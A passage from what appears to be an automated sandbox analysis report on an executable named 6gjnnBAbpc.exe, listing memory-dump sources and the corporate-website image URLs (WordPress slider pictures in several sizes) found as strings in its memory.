00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-150x55.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-260x95.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-300x110.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-50x18.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1-768x282.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_02_MEDICINE-1.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-1024x375.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-150x55.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-260x95.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-300x110.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-50x18.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE-768x281.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_04_INDUSTRIES_AUTOMOTIVE.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-1024x375.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-150x55.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-260x95.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-300x110.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-50x18.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM-768x281.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_05_INDUSTRIES_TELECOMM.jpg
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-102
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-150
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-260
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.com-sit.com/wp-content/uploads/2019/01/HOME_Slider_06_INDUSTRIES_COSUMER-ELECTRONICS-300
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 